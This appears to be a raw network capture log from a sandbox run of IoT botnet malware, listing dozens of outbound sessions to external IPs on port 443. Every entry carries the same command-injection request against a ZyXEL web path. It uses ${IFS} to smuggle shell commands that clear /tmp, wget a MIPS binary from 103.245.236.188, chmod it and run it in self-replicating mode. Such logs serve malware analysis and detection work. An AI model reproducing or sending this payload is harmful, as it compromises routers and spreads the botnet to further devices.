                                                Jan 12, 2024 18:24:35.836080074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4474192.168.2.1342370182.207.201.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836152077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4475192.168.2.134859461.153.0.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836213112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4476192.168.2.135513444.9.90.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836246014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4477192.168.2.135470293.143.62.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836323977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4478192.168.2.1351192219.105.222.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836389065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4479192.168.2.1343208107.159.34.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836429119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4480192.168.2.134484085.145.235.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836494923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4481192.168.2.1356062202.23.23.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836549044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4482192.168.2.1360618163.246.239.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836584091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4483192.168.2.133323672.120.181.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836628914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4484192.168.2.135495879.20.21.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836673975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4485192.168.2.1340552170.136.164.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836741924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4486192.168.2.135120670.182.135.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836776972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4487192.168.2.1333580212.44.218.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836827040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4488192.168.2.1336192132.236.191.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836863041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4489192.168.2.135429639.186.45.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836921930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4490192.168.2.133947254.220.39.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.836966038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4491192.168.2.133652427.74.189.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837035894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4492192.168.2.135478825.224.194.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837093115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4493192.168.2.1333642136.244.11.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837126970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4494192.168.2.1343360185.10.191.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837169886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4495192.168.2.134202275.40.205.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837232113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4496192.168.2.135138447.49.222.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837261915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4497192.168.2.1357354174.224.114.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837316990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4498192.168.2.133675442.63.68.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837407112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4499192.168.2.134304213.191.79.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837447882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4500192.168.2.134803878.77.33.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837512016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4501192.168.2.134124618.60.168.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837575912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4502192.168.2.13385902.162.48.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837639093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4503192.168.2.1346110193.177.46.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837667942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4504192.168.2.134767060.137.93.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837717056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4505192.168.2.135278053.205.95.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837775946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4506192.168.2.1359494173.250.60.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837831974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4507192.168.2.136035046.165.252.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837897062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4508192.168.2.1342348100.48.204.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837928057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4509192.168.2.1351840206.248.228.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.837969065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4510192.168.2.134446864.235.162.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838006973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4511192.168.2.133488046.107.122.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838042974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4512192.168.2.134148880.189.161.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838069916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4513192.168.2.1333348154.138.196.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838129997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4514192.168.2.1359422149.107.222.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838165045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4515192.168.2.1355626211.251.189.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838208914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4516192.168.2.133672642.115.197.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838288069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4517192.168.2.1342026108.133.11.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838344097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4518192.168.2.1357574197.77.192.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838397980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4519192.168.2.1336898124.241.218.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838426113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4520192.168.2.1349738154.57.159.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838475943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4521192.168.2.1352838151.39.113.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.838542938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4522192.168.2.133918492.146.127.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.839694977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4523192.168.2.1344540182.61.46.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.840940952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4524192.168.2.1336606169.155.38.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.841703892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4525192.168.2.1351234107.167.236.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.841871023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4526192.168.2.1344976120.11.241.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.843023062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4527192.168.2.1345936213.91.7.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.843127966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4528192.168.2.1356634139.34.201.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.843154907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4529192.168.2.134580478.226.240.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.843204975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4530192.168.2.1346006126.61.87.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.843235970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4531192.168.2.133346093.126.68.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861490965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4532192.168.2.1350028212.167.252.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861601114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4533192.168.2.1348822192.167.195.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861646891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4534192.168.2.135225425.57.4.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861679077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4535192.168.2.1350658208.118.149.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.861720085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4536192.168.2.1347476142.25.104.44443
                                                TimestampBytes transferredDirectionData
